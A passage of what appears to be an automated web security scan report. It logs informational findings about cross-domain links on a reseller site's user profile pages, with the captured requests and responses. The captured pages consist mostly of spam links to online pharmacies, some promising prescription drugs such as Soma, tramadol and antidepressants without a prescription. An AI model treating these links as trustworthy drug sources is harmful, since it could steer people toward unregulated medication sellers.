href="http://www.buying-rx.com/cart.php?action=view_cat&id=74">Cholesterol - Ezetrol, Simvastatin, Sortis, Zocor</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.316. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=bayrar

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.gelonida-paracetamol.info/
http://www.healthstoreforall.com/
http://www.instantrx.info/
http://www.morerx.info/
http://www.narcotic-pharmacy.com/
http://www.planum-temazepam.com/
http://www.rx-buy.info/
http://www.rx-buy.info/cart.php?action=view_cat&id=1
http://www.rx-buy.info/cart.php?action=view_cat&id=10
http://www.rx-buy.info/cart.php?action=view_cat&id=104
http://www.rx-buy.info/cart.php?action=view_cat&id=11
http://www.rx-buy.info/cart.php?action=view_cat&id=174
http://www.rx-buy.info/cart.php?action=view_cat&id=5
http://www.rx-buy.info/cart.php?action=view_cat&id=69
http://www.rx-buy.info/cart.php?action=view_cat&id=7
http://www.rx-buy.info/cart.php?action=view_cat&id=74
http://www.rx-buy.info/cart.php?action=view_cat&id=76
http://www.rxhint.info/
http://www.superdiscountprescriptions.com/
http://www.yourpillrefill.com/

Request

GET /user_detail.php?u=bayrar HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:09:38 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11701

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.rx-buy.info/">http://www.rx-buy.info/</a>
...[SNIP]...
<td width="130">
<a href="http://www.instantrx.info">Instant Rx</a> | <a href="http://www.morerx.info">More Rx</a> | <a href="http://www.rxhint.info">Rx Hint</a> | <a href="http://www.healthstoreforall.com"> Health Store For All</a> | <a href="http://www.superdiscountprescriptions.com">Super Discount Prescription</a> | <a href="http://www.yourpillrefill.com"> Your Pill Refill </a>|<a href="http://www.PLANUM-TEMAZEPAM.COM"> Planum Temazepam</a> | <a href="http://www.GELONIDA-PARACETAMOL.INFO"> Gelonida Paracetamol </a> | <a href="http://www.NARCOTIC-PHARMACY.COM"> Narcotic Pharmacy </a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=104">Allergy Products</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=1">Buy Anti Depressants</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=10">Get Antibiotics</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=69">Order Asthma Products</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=5">Blood Presure</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=7">Diabetes Pills</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=76">Formigran, Maxalt, Migraeflux, Pirazetam</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=174">Adekin For Parkinson</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=11">Sleep & Insomnia - Novanox, Planum</a> | <a href="http://www.rx-buy.info/cart.php?action=view_cat&id=74">Cholesterol - Ezetrol, Simvastatin, Sortis, Zocor</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.317. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=rassis

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.buy-pharmacy-drugs.com/
http://www.buy-rx.eu/
http://www.buycoolrx.com/
http://www.getrxpharmacy.com/
http://www.happyrxbuy.com/
http://www.happyrxshop.com/
http://www.my-discount-drugstore.com/
http://www.rxassistent.com/
http://www.rxassistent.com/index.php?p=search&categoryId=1
http://www.rxassistent.com/index.php?p=search&categoryId=12
http://www.rxassistent.com/index.php?p=search&categoryId=13
http://www.rxassistent.com/index.php?p=search&categoryId=14
http://www.rxassistent.com/index.php?p=search&categoryId=20
http://www.rxassistent.com/index.php?p=search&categoryId=23
http://www.rxassistent.com/index.php?p=search&categoryId=29
http://www.rxassistent.com/index.php?p=search&categoryId=6
http://www.rxassistent.com/index.php?p=search&categoryId=7
http://www.rxassistent.com/index.php?p=search&categoryId=9
http://www.rxpharmacy-buy.com/

Request

GET /user_detail.php?u=rassis HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:12:06 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 12242

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.rxassistent.com/">http://www.rxassistent.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.GETRXPHARMACY.com">Get Rx Pharmacy</a> | <a href="http://www.BUY-PHARMACY-DRUGS.com">Buy Pharmacy Drugs</a> | <a href="http://www.MY-DISCOUNT-DRUGSTORE.com">My Discount Drugstore</a> | <a href="http://www.buy-rx.eu"> Buy Rx</a> | <a href="http://www.happyrxshop.com">Happy Rx Shop </a> | <a href="http://www.RXPHARMACY-BUY.com"> Rxpharmacy Buy </a>|<a href="http://www.HAPPYRXBUY.com"> Happy Rx Buy</a> | <a href="http://www.BUYCOOLRX.com"> Buy Cool Rx </a>| <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=1">Online Allergies</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=7">No Prescription Anti Depressants</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=29">Generic Antibiotics</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=6">Cholesterol Pills</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=9">Epilepsy Drugs</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=12">Herpes - Famvir, Rebetol, Valtrex</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=14">Hormonol Pharmacy</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=20">All Rx Products</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=23">Rheumatic - Arava, Decadron, Naprosyn</a> | <a href="http://www.Rxassistent.com/index.php?p=search&categoryId=13">Hiv - Retrovir, Sustiva, Videx, Zerit</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.318. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=somad

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.4life-health.com/cart.php?action=view&id=532
http://www.amoxicillinrx.com/soma.php
http://www.anti-depressants-pharmacy.com/soma.php
http://www.approvedpillsource.com/soma.php
http://www.approvedpillsource.info/cart.php?action=view&id=532
http://www.bestgenericprice.com/soma.php
http://www.bewellbehealthy.com/cart.php?action=view&id=532
http://www.buy-prescription-meds.com/soma.php
http://www.buy-ultracet-online.com/soma.php
http://www.buying-rx.com/cart.php?action=view&id=532
http://www.click2buydrugs.com/soma.php
http://www.clickapill.com/soma.php
http://www.clicknowrx.com/soma.php
http://www.customerpharmacy.com/cart.php?action=view&id=532
http://www.cyclobenzaprinerx.com/soma.php
http://www.drugs-to-go.com/soma.php
http://www.drugsforyourhealth.com/cart.php?action=view&id=532
http://www.drugstorecare.com/soma.php
http://www.eprescription-drug.com/cart.php?action=view&id=532
http://www.esgicplus-rx.com.com/soma.php
http://www.fioricetsupply.com/soma.php
http://www.freebonusrx.com/cart.php?action=view&id=532
http://www.freeprescriptionsrx.com/soma.php
http://www.gelonida-paracetamol.info/cart.php?action=view&id=532
http://www.get-rx-pharmacy.com/soma.php
http://www.getmemypills.com/soma.php
http://www.happyrxpharmacy.com/cart.php?action=view&id=532
http://www.healthcare-opportunity.com/cart.php?action=view&id=532
http://www.healthstoreforall.com/cart.php?action=view&id=532
http://www.healthyrecipes4all.com/soma.php
http://www.morerx.info/cart.php?action=view&id=532
http://www.online-antibiotics.info/cart.php?action=view&id=532
http://www.paracetamol-analgesic.info/cart.php?action=view&id=532
http://www.paylessforgeneric.com/soma.php
http://www.pills-value.com/soma.php
http://www.pills2me.com/soma.php
http://www.planum-temazepam.com/cart.php?action=view&id=532
http://www.prescriptionconsult.com/cart.php?action=view&id=532
http://www.prescriptions-store.com/soma.php
http://www.privacy-rx-pills.com/soma.php
http://www.prozacrx.com/soma.php
http://www.purchase-zovirax.com/soma.php
http://www.qualitygenericpills.com/soma.php
http://www.reliableprescriptionsonline.com/soma.php
http://www.rx-buy.info/cart.php?action=view&id=532
http://www.rx-free.com/soma.php
http://www.rxalternativehealth.com/cart.php?action=view&id=532
http://www.rxdiscountplus.com/soma.php
http://www.rxhint.com/soma.php
http://www.rxhint.info/cart.php?action=view&id=532
http://www.rxpills4u.com/soma.php
http://www.soma-drugs.com/soma.php
http://www.soma-drugs/
http://www.soma-prescription.com/soma.php
http://www.somasupply.com/
http://www.somawatsonbrand.com/
http://www.superdiscountprescriptions.com/cart.php?action=view&id=532
http://www.tramadol-rx.com/soma.php
http://www.tramadolsupply.com/soma.php
http://www.ultracetrx.com/soma.php
http://www.ultram-rx.com/soma.php
http://www.ultramrx.com/soma.php
http://www.yourpillrefill.com/cart.php?action=view&id=532
http://www.zoloft-prescription.com/soma.php

Request

GET /user_detail.php?u=somad HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:14:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 17019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.somawatsonbrand.com/">http://www.somawatsonbrand.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.anti-depressants-pharmacy.com/soma.php">Soma Muscle Relaxant</a> <a href="http://www.soma-drugs.com/soma.php">Soma Pharmacy</a> <a href="http://www.clickapill.com/soma.php">Relax Stiffness With Soma</a> <a href="http://www.approvedpillsource.com/soma.php">Muscle Injuries Go Away With Soma</a> <a href="http://www.buy-ultracet-online.com/soma.php">Buy Soma</a> <a href="http://www.clicknowrx.com/soma.php">OrderSoma</a> <a href="http://www.fioricetsupply.com/soma.php">Cheap Soma</a> <a href="http://www.tramadolsupply.com/soma.php">Get Soma</a> <a href="http://www.PILLS2ME.com/soma.php">Soma For Sprains</a> <a href="http://www.healthyrecipes4all.com/soma.php">Soma - Watson Brand</a> <a href="http://www.getmemypills.com/soma.php">Generic Soma</a> <a href="http://www.rxdiscountplus.com/soma.php">Soma - 350 mg - 30 Tabs</a> <a href="http://www.rxhint.com/soma.php">Soma - 350 mg - 90 Tabs</a> <a href="http://www.FREEPRESCRIPTIONSRX.com/soma.php">Soma 350 mg - 30 Tabs Watson </a> <a href="http://www.PRESCRIPTIONS-STORE.com/soma.php">Soma - 350 mg - 90 Tabs Watson </a> <a href="http://www.BUY-PRESCRIPTION-MEDS.com/soma.php">Choose Soma</a> <a href="http://www.PILLS-VALUE.com/soma.php">Soam From Rx Pharmacy</a> <a href="http://www.PRIVACY-RX-PILLS.com/soma.php">Treat Pain With Soma</a> <a href="http://www.DRUGS-TO-GO.com/soma.php">Soma Pill</a> <a href="http://www.CLICK2BUYDRUGS.com/soma.php">Soma Drug</a> <a href="http://www.paylessforgeneric.com/soma.php">Treat With Soma</a> <a href="http://www.bestgenericprice.com/soma.php">Soma medicine</a> <a href="http://www.get-rx-pharmacy.com/soma.php">Oral Soma</a> <a href="http://www.qualitygenericpills.com/soma.php">Soma Muscle Relaxant</a> <a href="http://www.reliableprescriptionsonline.com/soma.php">Relax Stiffness With Soma</a> <a href="http://www.rx-free.com/soma.php">Muscle Injuries Go Away With Soma</a> <a href="http://www.rxpills4u.com/soma.php">Buy Soma</a> <a href="http://www.drugstorecare.com/soma.php">Soma For Sprains</a> <a href="http://www.tramadol-rx.com/soma.php">Carisoprodol</a> <a href="http://www.ultram-rx.com/soma.php">Carisoprodol Online</a> <a href="http://www.purchase-zovirax.com/soma.php">Buy Soma</a> <a href="http://www.zoloft-prescription.com/soma.php">Order Soma</a> <a href="http://www.soma-prescription.com/soma.php">Get Soma</a> <a href="http://www.ultracetrx.com/soma.php">Soma Online</a> <a href="http://www.soma-drugs/">Soma Pharmacy</a> <a href="http://www.ultramrx.com/soma.php">Soma</a> <a href="http://www.cyclobenzaprinerx.com/soma.php">Soma Tabs</a> <a href="http://www.prozacrx.com/soma.php">Carisoprodol - Muscle Spasms Treat</a> <a href="http://www.amoxicillinrx.com/soma.php">Carisoprodol - 350 mg - 30 Tabs</a> <a href="http://www.esgicplus-rx.com.com/soma.php">Carisoprodol - 350 mg - 90 Tabs</a> <a href="http://www.drugsforyourhealth.com/cart.php?action=view&id=532">Somadril Pill</a> <a href="http://www.buying-rx.com/cart.php?action=view&id=532">Somadril Muscle Relaxant</a> <a href="http://www.rx-buy.info/cart.php?action=view&id=532">Same as Soma - Somadril </a> <a href="http://www.customerpharmacy.com/cart.php?action=view&id=532">Generic Soma</a> <a href="http://www.freebonusrx.com/cart.php?action=view&id=532">Somadril Tabs</a> <a href="http://www.healthcare-opportunity.com/cart.php?action=view&id=532">Somadril Muscle Relaxant</a> <a href="http://www.prescriptionconsult.com/cart.php?action=view&id=532">Somadril Online</a> <a href="http://www.rxalternativehealth.com/cart.php?action=view&id=532">Somadril For Nervous System</a> <a href="http://www.happyrxpharmacy.com/cart.php?action=view&id=532">Somadril Effect</a> <a href="http://www.bewellbehealthy.com/cart.php?action=view&id=532">Somadril For Strains</a> <a href="http://www.4life-health.com/cart.php?action=view&id=532">Somadril - Muscle Spasms Treat</a> <a href="http://www.eprescription-drug.com/cart.php?action=view&id=532">Order Somadril </a> <a href="http://www.online-antibiotics.info/cart.php?action=view&id=532">Get Somadril </a> <a href="http://www.approvedpillsource.info/cart.php?action=view&id=532">Somadril Pharmacy</a> <a href="http://www.morerx.info/cart.php?action=view&id=532">Somadril For Injury</a> <a href="http://www.rxhint.info/cart.php?action=view&id=532">Somadril For Nervous System</a> <a href="http://www.healthstoreforall.com/cart.php?action=view&id=532">Somadril Effect</a> <a href="http://www.superdiscountprescriptions.com/cart.php?action=view&id=532">Somadril For Nervous System</a> <a href="http://www.yourpillrefill.com/cart.php?action=view&id=532">Somadril 350 mg x100 Tabs</a> <a href="http://www.PLANUM-TEMAZEPAM.com/cart.php?action=view&id=532">Oral Somadril</a> <a href="http://www.GELONIDA-PARACETAMOL.INFO/cart.php?action=view&id=532">Somadril For Injury</a> <a href="http://www.PARACETAMOL-ANALGESIC.INFO/cart.php?action=view&id=532">Somadril For Stiffness</a>
<a href="http://www.somasupply.com/">Soma Supply</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.319. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=genmed

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.buy-buspar-pills.com/
http://www.erxpharma-online.com/
http://www.genericmedsale.com/
http://www.genericmedsale.com/buspar.php
http://www.genericmedsale.com/celexa.php
http://www.genericmedsale.com/fioricet.php
http://www.genericmedsale.com/tramadol.php
http://www.get-rx-pharmacy.com/
http://www.healthfitnessportal.com/
http://www.lowcostpillsource.com/
http://www.needrxquick.com/
http://www.order-fioricet-pills.com/
http://www.pills-store-online.com/
http://www.pills-store-online.com/esgic-plus.php
http://www.tobuyhealth.com/

Request

GET /user_detail.php?u=genmed HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:03:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.genericmedsale.com">http://www.genericmedsale.com</a>
...[SNIP]...
<td width="130">
<a href="http://www.buy-buspar-pills.com">Buy Buspar Pills</a> | <a href="http://www.lowcostpillsource.com">Low Cost Pill Source</a> | <a href="http://www.tobuyhealth.com">To Buy Health</a> | <a href="http://www.order-fioricet-pills.com"> Order Fioricet Pills</a> | <a href="http://www.PILLS-STORE-ONLINE.COM"> Pills Store Online </a> | <a href="http://www.erxpharma-online.com"> E Rx Pharma Online </a>|<a href="http://www.needrxquick.com"> Need Rx Quick </a> | <a href="http://www.get-rx-pharmacy.com"> Get Rx Pharmacy </a> <a href="http://www.PILLS-STORE-ONLINE.COM/esgic-plus.php"> Esgic Plus Generic </a> | <a href="http://www.healthfitnessportal.com"> Health Fitness Portal </a> | <a href="http://www.genericmedsale.com/celexa.php"> Generic Med Celexa </a> | <a href="http://www.genericmedsale.com/buspar.php"> Med Sale Buspar </a> | <a href="http://www.genericmedsale.com/fioricet.php"> Generic Fioricet </a> | <a href="http://www.genericmedsale.com/tramadol.php"> Generic Sale for Tramadol </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.320. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=maraton

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.drugpharmacist.com/
http://www.medicare-california.com/
http://www.pharmaceutical-sale.com/
http://www.pharmaceutical-sale.com/buspar.php
http://www.pharmaceutical-sale.com/celexa.php
http://www.pharmaceutical-sale.com/elidel.php
http://www.pharmaceutical-sale.com/esgic-plus.php
http://www.pharmaceutical-sale.com/fioricet.php
http://www.pharmaceutical-sale.com/paxil.php
http://www.pharmaceutical-sale.com/prozac.php
http://www.pharmaceutical-sale.com/tramadol.php
http://www.rxmedicare.org/

Request

GET /user_detail.php?u=maraton HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 01:10:02 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11126

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.pharmaceutical-sale.com/">http://www.pharmaceutical-sale.com/</a>
...[SNIP]...
<td width="130">
<a href="http://www.pharmaceutical-sale.com/tramadol.php">Tramadol From Your Pharmacy</a> | <a href="http://www.pharmaceutical-sale.com/celexa.php">Celexa Online</a> | <a href="http://www.pharmaceutical-sale.com/buspar.php">Buspar Rx For You</a> | <a href="http://www.pharmaceutical-sale.com/fioricet.php"> Fioricet For Pain Relief</a> | <a href="http://www.pharmaceutical-sale.com/esgic-plus.php">Treat Your Headache With Esgic Plus </a> | <a href="http://www.pharmaceutical-sale.com/elidel.php"> Buy Elidel - Skin Care Antitod </a>|<a href="http://www.pharmaceutical-sale.com/prozac.php"> Prozac Anti Depressant</a> | <a href="http://www.pharmaceutical-sale.com/paxil.php"> Paxil To Treat Depression </a> | <a href="http://www.drugpharmacist.com"> Drug Pharmacist </a> | <a href="http://www.medicare-california.com"> Medicare California </a> | <a href="http://www.rxmedicare.org/"> Rx Medicare Information </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.321. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=0000001

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.euro-drugs.biz/
http://www.euro-drugs.biz/drugs/Terramycin.htm
http://www.euro-drugs.biz/drugs/Tobradex.htm
http://www.euro-drugs.biz/drugs/Vagifem.htm
http://www.euro-drugs.biz/rx/Silagra.htm
http://www.euro-drugs.biz/rx/Tenvir.htm
http://www.euro-drugs.biz/rx/Triomune.htm
http://www.euro-drugs.biz/rx/Urimax.htm
http://www.euro-drugs.biz/rx/Venlor.htm
http://www.euro-drugs.biz/rx/Viraday.htm

Request

GET /user_detail.php?u=0000001 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/user_search.php?pflag=search
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:08:25 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 10879

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
</a><a href=http://www.euro-drugs.biz> Prescriptions online</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Silagra.htm>Silagra indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Tenvir.htm>Tenvir indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/drugs/Terramycin.htm>Terramycin indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/drugs/Tobradex.htm>Tobradex indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Triomune.htm>Triomune indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Urimax.htm>Urimax indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/drugs/Vagifem.htm>Vagifem indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Venlor.htm>Venlor indications</a>
...[SNIP]...
<br><a href=http://www.euro-drugs.biz/rx/Viraday.htm>Viraday indications</a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
<a href="http://jigsaw.w3.org/css-validator/check/referer"><img src="http://www.resellerbase.com/themes/kosmos/images/css.gif" border="0" alt="Valid CSS" />
...[SNIP]...

6.322. http://www.resellerbase.com/user_detail.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/user_detail.php

Issue detail

The page was loaded from a URL containing a query string:

http://www.resellerbase.com/user_detail.php?u=boman

The response contains the following links to other domains:

http://jigsaw.w3.org/css-validator/check/referer
http://validator.w3.org/check?uri=referer
http://www.drug-care.info/
http://www.druginformations.org/
http://www.drugviews.com/
http://www.herbal-women.com/
http://www.herbals4ever.com/
http://www.pillsbenefit.com/
http://www.rightplacetobuy.com/
http://www.trustedstore.info/
http://www.typos-words.com/
http://www.typosdomain.com/
http://www.you-can-buy.com/

Request

GET /user_detail.php?u=boman HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.1 200 OK
Date: Thu, 18 Nov 2010 00:59:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 11227

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>User Detail</title>

...[SNIP]...
<td><a href="http://www.trustedstore.info/">http://www.trustedstore.info/</a>
...[SNIP]...
<td width="130">
<a href="http://www.typos-words.com">Typos Words</a> | <a href="http://www.drug-care.info/">Drug Care</a> | <a href="http://www.drugviews.com/">Drug Views</a> | <a href="http://www.druginformations.org/"> Drug Informations</a> | <a href="http://www.pillsbenefit.com/">Pills Benefit </a> | <a href="http://www.rightplacetobuy.com/"> Right Place To Buy </a>|<a href="http://www.herbals4ever.com/"> Herbals For Ever</a> | <a href="http://www.herbal-women.com/"> Herbal Woman </a> | <a href="http://www.typosdomain.com"> Typos Domain </a> | <a href="http://www.you-can-buy.com"> You Can Buy </a>
...[SNIP]...
<td colspan="13" align="right">
<a href="http://validator.w3.org/check?uri=referer"><img src="http://www.resellerbase.com/themes/kosmos/images/xhtml.gif" border="0" alt="Valid XHTML 1.0 Transitional" /></a>
 
